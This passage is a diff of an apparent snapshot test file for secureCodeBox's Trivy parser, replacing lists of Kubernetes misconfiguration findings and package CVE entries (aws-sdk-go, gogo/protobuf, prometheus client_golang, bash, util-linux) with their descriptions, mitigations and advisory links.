CPU limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", - "name": "CPU not limited(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'resources.limits.cpu')", + "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-controller-manager", + "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", + "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv011", + "value": "https://avd.aquasec.com/misconfig/ksv030", }, { "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, ], "severity": "LOW", @@ -54227,202 +54278,111 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV012", + "foundIn": "Target: 'Deployment/securecodebox-controller-manager' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV106", "installedVersion": undefined, "packageName": undefined, "references": [ "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv012", + "https://avd.aquasec.com/misconfig/ksv106", ], }, "category": "Misconfiguration", - "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", - "name": "Runs as root user(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'securityContext.runAsNonRoot' to true)", + "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-controller-manager", + "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", + "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv012", + "value": "https://avd.aquasec.com/misconfig/ksv106", }, { "type": "URL", "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV014", - "installedVersion": undefined, - "packageName": undefined, + "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2020-8911", + "installedVersion": "v1.35.9", + "packageName": "github.com/aws/aws-sdk-go", "references": [ - "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", - "https://avd.aquasec.com/misconfig/ksv014", + "https://access.redhat.com/security/cve/CVE-2020-8911", + "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", + "https://bugzilla.redhat.com/show_bug.cgi?id=1869800", + "https://github.com/advisories/GHSA-f5pg-7wfw-84q9", + "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", + "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", + "https://github.com/aws/aws-sdk-go/pull/3403", + "https://github.com/google/security-research/security/advisories/GHSA-f5pg-7wfw-84q9", + "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", + "https://nvd.nist.gov/vuln/detail/CVE-2020-8911", + "https://pkg.go.dev/vuln/GO-2022-0646", + "https://www.cve.org/CVERecord?id=CVE-2020-8911", ], }, - "category": "Misconfiguration", - "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", - "name": "Root file system is not read-only(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'securityContext.readOnlyRootFilesystem' to true)", + "category": "Vulnerability", + "description": "A padding oracle vulnerability exists in the AWS S3 Crypto SDK for GoLang versions prior to V2. The SDK allows users to encrypt files with AES-CBC without computing a Message Authentication Code (MAC), which then allows an attacker who has write access to the target's S3 bucket and can observe whether or not an endpoint with access to the key can decrypt a file, they can reconstruct the plaintext with (on average) 128*length (plaintext) queries to the endpoint, by exploiting CBC's ability to manipulate the bytes of the next block and PKCS5 padding errors. It is recommended to update your SDK to V2 or later, and re-encrypt your files.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "mitigation": undefined, + "name": "aws/aws-sdk-go: CBC padding oracle issue in AWS S3 Crypto SDK for golang", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv014", + "value": "https://avd.aquasec.com/nvd/cve-2020-8911", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "value": "https://access.redhat.com/security/cve/CVE-2020-8911", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV016", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv016", - ], - }, - "category": "Misconfiguration", - "description": "When containers have memory requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Set 'containers[].resources.requests.memory'.", - "name": "Memory requests not specified(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'resources.requests.memory')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv016", + "value": "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1869800", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV018", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv018", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing memory limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", - "name": "Memory not limited(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'resources.limits.memory')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv018", + "value": "https://github.com/advisories/GHSA-f5pg-7wfw-84q9", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV020", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv020", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", - "name": "Runs with low user ID(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'securityContext.runAsUser' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv020", + "value": "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://github.com/aws/aws-sdk-go/pull/3403", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV021", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv021", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", - "name": "Runs with low group ID(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'securityContext.runAsGroup' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv021", + "value": "https://github.com/google/security-research/security/advisories/GHSA-f5pg-7wfw-84q9", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV023", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv023", - ], - }, - "category": "Misconfiguration", - "description": "HostPath volumes must be forbidden.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Do not set 'spec.volumes[*].hostPath'.", - "name": "hostPath volumes mounted(Pod 'kube-controller-manager-kind-control-plane' should not set 'spec.template.volumes.hostPath')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv023", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-8911", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "value": "https://pkg.go.dev/vuln/GO-2022-0646", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-8911", }, ], "severity": "MEDIUM", @@ -54430,2796 +54390,2560 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV106", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv106", + "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2020-8912", + "installedVersion": "v1.35.9", + "packageName": "github.com/aws/aws-sdk-go", + "references": [ + "https://access.redhat.com/security/cve/CVE-2020-8912", + "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", + "https://bugzilla.redhat.com/show_bug.cgi?id=1869801", + "https://github.com/advisories/GHSA-7f33-f4f5-xwgw", + "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", + "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", + "https://github.com/aws/aws-sdk-go/pull/3403", + "https://github.com/google/security-research/security/advisories/GHSA-7f33-f4f5-xwgw", + "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", + "https://nvd.nist.gov/vuln/detail/CVE-2020-8912", + "https://pkg.go.dev/vuln/GO-2022-0646", + "https://www.cve.org/CVERecord?id=CVE-2020-8912", ], }, - "category": "Misconfiguration", - "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", - "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "category": "Vulnerability", + "description": "A vulnerability in the in-band key negotiation exists in the AWS S3 Crypto SDK for GoLang versions prior to V2. An attacker with write access to the targeted bucket can change the encryption algorithm of an object in the bucket, which can then allow them to change AES-GCM to AES-CTR. Using this in combination with a decryption oracle can reveal the authentication key used by AES-GCM as decrypting the GMAC tag leaves the authentication key recoverable as an algebraic equation. It is recommended to update your SDK to V2 or later, and re-encrypt your files.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "mitigation": undefined, + "name": "aws-sdk-go: In-band key negotiation issue in AWS S3 Crypto SDK for golang", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv106", + "value": "https://avd.aquasec.com/nvd/cve-2020-8912", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://access.redhat.com/security/cve/CVE-2020-8912", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2011-3374", - "installedVersion": "2.2.4", - "packageName": "apt", - "references": [ - "https://access.redhat.com/security/cve/cve-2011-3374", - "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", - "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", - "https://seclists.org/fulldisclosure/2011/Sep/221", - "https://security-tracker.debian.org/tracker/CVE-2011-3374", - "https://snyk.io/vuln/SNYK-LINUX-APT-116518", - "https://ubuntu.com/security/CVE-2011-3374", - ], - }, - "category": "Vulnerability", - "description": "It was found that apt-key in apt, all versions, do not correctly validate gpg keys with the master keyring, leading to a potential man-in-the-middle attack.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "It was found that apt-key in apt, all versions, do not correctly valid ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2011-3374", + "value": "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/cve-2011-3374", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1869801", }, { "type": "URL", - "value": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", + "value": "https://github.com/advisories/GHSA-7f33-f4f5-xwgw", }, { "type": "URL", - "value": "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", + "value": "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", }, { "type": "URL", - "value": "https://seclists.org/fulldisclosure/2011/Sep/221", + "value": "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2011-3374", + "value": "https://github.com/aws/aws-sdk-go/pull/3403", }, { "type": "URL", - "value": "https://snyk.io/vuln/SNYK-LINUX-APT-116518", + "value": "https://github.com/google/security-research/security/advisories/GHSA-7f33-f4f5-xwgw", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2011-3374", + "value": "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-8912", + }, + { + "type": "URL", + "value": "https://pkg.go.dev/vuln/GO-2022-0646", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-8912", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-3715", - "installedVersion": "5.1-2+deb11u1", - "packageName": "bash", + "fixedVersion": "1.3.2", + "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2021-3121", + "installedVersion": "v1.3.1", + "packageName": "github.com/gogo/protobuf", "references": [ - "https://access.redhat.com/errata/RHSA-2023:0340", - "https://access.redhat.com/security/cve/CVE-2022-3715", - "https://bugzilla.redhat.com/2126720", - "https://bugzilla.redhat.com/show_bug.cgi?id=2126720", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3715", - "https://errata.almalinux.org/9/ALSA-2023-0340.html", - "https://errata.rockylinux.org/RLSA-2023:0340", - "https://linux.oracle.com/cve/CVE-2022-3715.html", - "https://linux.oracle.com/errata/ELSA-2023-0340.html", - "https://lists.gnu.org/archive/html/bug-bash/2022-08/msg00147.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-3715", - "https://www.cve.org/CVERecord?id=CVE-2022-3715", + "https://access.redhat.com/security/cve/CVE-2021-3121", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3121", + "https://discuss.hashicorp.com/t/hcsec-2021-23-consul-exposed-to-denial-of-service-in-gogo-protobuf-dependency/29025", + "https://github.com/advisories/GHSA-c3h9-896r-86jm", + "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc", + "https://github.com/gogo/protobuf/compare/v1.3.1...v1.3.2", + "https://lists.apache.org/thread.html/r68032132c0399c29d6cdc7bd44918535da54060a10a12b1591328bff@%3Cnotifications.skywalking.apache.org%3E", + "https://lists.apache.org/thread.html/r88d69555cb74a129a7bf84838073b61259b4a3830190e05a3b87994e@%3Ccommits.pulsar.apache.org%3E", + "https://lists.apache.org/thread.html/rc1e9ff22c5641d73701ba56362fb867d40ed287cca000b131dcf4a44@%3Ccommits.pulsar.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3121", + "https://pkg.go.dev/vuln/GO-2021-0053", + "https://security.netapp.com/advisory/ntap-20210219-0006/", + "https://www.cve.org/CVERecord?id=CVE-2021-3121", ], }, "category": "Vulnerability", - "description": "A flaw was found in the bash package, where a heap-buffer overflow can occur in valid parameter_transform. This issue may lead to memory problems.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "description": "An issue was discovered in GoGo Protobuf before 1.3.2. plugin/unmarshal/unmarshal.go lacks certain index validation, aka the "skippy peanut butter" issue.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", "mitigation": undefined, - "name": "a heap-buffer-overflow in valid_parameter_transform", + "name": "gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-3715", + "value": "https://avd.aquasec.com/nvd/cve-2021-3121", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0340", + "value": "https://access.redhat.com/security/cve/CVE-2021-3121", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-3715", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3121", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2126720", + "value": "https://discuss.hashicorp.com/t/hcsec-2021-23-consul-exposed-to-denial-of-service-in-gogo-protobuf-dependency/29025", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2126720", + "value": "https://github.com/advisories/GHSA-c3h9-896r-86jm", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3715", + "value": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0340.html", + "value": "https://github.com/gogo/protobuf/compare/v1.3.1...v1.3.2", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0340", + "value": "https://lists.apache.org/thread.html/r68032132c0399c29d6cdc7bd44918535da54060a10a12b1591328bff@%3Cnotifications.skywalking.apache.org%3E", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-3715.html", + "value": "https://lists.apache.org/thread.html/r88d69555cb74a129a7bf84838073b61259b4a3830190e05a3b87994e@%3Ccommits.pulsar.apache.org%3E", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0340.html", + "value": "https://lists.apache.org/thread.html/rc1e9ff22c5641d73701ba56362fb867d40ed287cca000b131dcf4a44@%3Ccommits.pulsar.apache.org%3E", }, { "type": "URL", - "value": "https://lists.gnu.org/archive/html/bug-bash/2022-08/msg00147.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3121", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3715", + "value": "https://pkg.go.dev/vuln/GO-2021-0053", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-3715", + "value": "https://security.netapp.com/advisory/ntap-20210219-0006/", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3121", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-0563", - "installedVersion": "1:2.36.1-8+deb11u1", - "packageName": "bsdutils", + "fixedVersion": "1.11.1", + "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-21698", + "installedVersion": "v1.8.0", + "packageName": "github.com/prometheus/client_golang", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-0563", - "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", - "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", - "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", - "https://security.netapp.com/advisory/ntap-20220331-0002/", - "https://www.cve.org/CVERecord?id=CVE-2022-0563", + "https://access.redhat.com/errata/RHSA-2022:8057", + "https://access.redhat.com/security/cve/CVE-2022-21698", + "https://bugzilla.redhat.com/2044628", + "https://bugzilla.redhat.com/2045880", + "https://bugzilla.redhat.com/2050648", + "https://bugzilla.redhat.com/2050742", + "https://bugzilla.redhat.com/2050743", + "https://bugzilla.redhat.com/2065290", + "https://bugzilla.redhat.com/2107342", + "https://bugzilla.redhat.com/2107371", + "https://bugzilla.redhat.com/2107374", + "https://bugzilla.redhat.com/2107376", + "https://bugzilla.redhat.com/2107383", + "https://bugzilla.redhat.com/2107386", + "https://bugzilla.redhat.com/2107388", + "https://bugzilla.redhat.com/2107390", + "https://bugzilla.redhat.com/2107392", + "https://bugzilla.redhat.com/show_bug.cgi?id=2044628", + "https://bugzilla.redhat.com/show_bug.cgi?id=2045880", + "https://bugzilla.redhat.com/show_bug.cgi?id=2050648", + "https://bugzilla.redhat.com/show_bug.cgi?id=2050742", + "https://bugzilla.redhat.com/show_bug.cgi?id=2050743", + "https://bugzilla.redhat.com/show_bug.cgi?id=2055349", + "https://bugzilla.redhat.com/show_bug.cgi?id=2065290", + "https://bugzilla.redhat.com/show_bug.cgi?id=2104367", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107342", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107376", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107390", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107392", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23648", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1962", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21673", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21698", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21702", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21703", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21713", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28131", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30631", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30633", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "https://errata.almalinux.org/9/ALSA-2022-8057.html", + "https://errata.rockylinux.org/RLSA-2022:8057", + "https://github.com/advisories/GHSA-cg3q-j54f-5p7p", + "https://github.com/prometheus/client_golang/pull/962", + "https://github.com/prometheus/client_golang/pull/987", + "https://github.com/prometheus/client_golang/releases/tag/v1.11.1", + "https://github.com/prometheus/client_golang/security/advisories/GHSA-cg3q-j54f-5p7p", + "https://linux.oracle.com/cve/CVE-2022-21698.html", + "https://linux.oracle.com/errata/ELSA-2022-8057.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2IK53GWZ475OQ6ENABKMJMTOBZG6LXUR/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2PFW6Q2LXXWTFRTMTRN4ZGADFRQPKJ3D/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/36GUEPA5TPSC57DZTPYPBL6T7UPQ2FRH/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3L6GDN5S5QZSCFKWD3GKL2RDZQ6B4UWA/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4KDETHL5XCT6RZN2BBNOCEXRZ2W3SFU3/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5OGNAFVXSMTTT2UPH6CS3IH6L3KM42Q7/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7V7I72LSQ3IET3QJR6QPAVGJZ4CBDLN5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AK7CJBCGERCRXYUR2EWDSSDVAQMTAZGX/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FY3N7H6VSDZM37B4SKM2PFFCUWU7QYWN/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HLAQRRGNSO5MYCPAXGPH2OCSHOGHSQMQ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KBMVIQFKQDSSTHVVJWJ4QH6TW3JVB7XZ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MH6ALXEQXIFQRQFNJ5Y2MJ5DFPIX76VN/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RN7JGC2LVHPEGSJYODFUV5FEKPBVG4D7/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SASRKYHT5ZFSVMJUQUG3UAEQRJYGJKAR/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZKORFJTRRDJCWBTJPISKKCVMMMJBIRLG/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-21698", + "https://pkg.go.dev/vuln/GO-2022-0322", + "https://www.cve.org/CVERecord?id=CVE-2022-21698", ], }, "category": "Vulnerability", - "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", - "location": 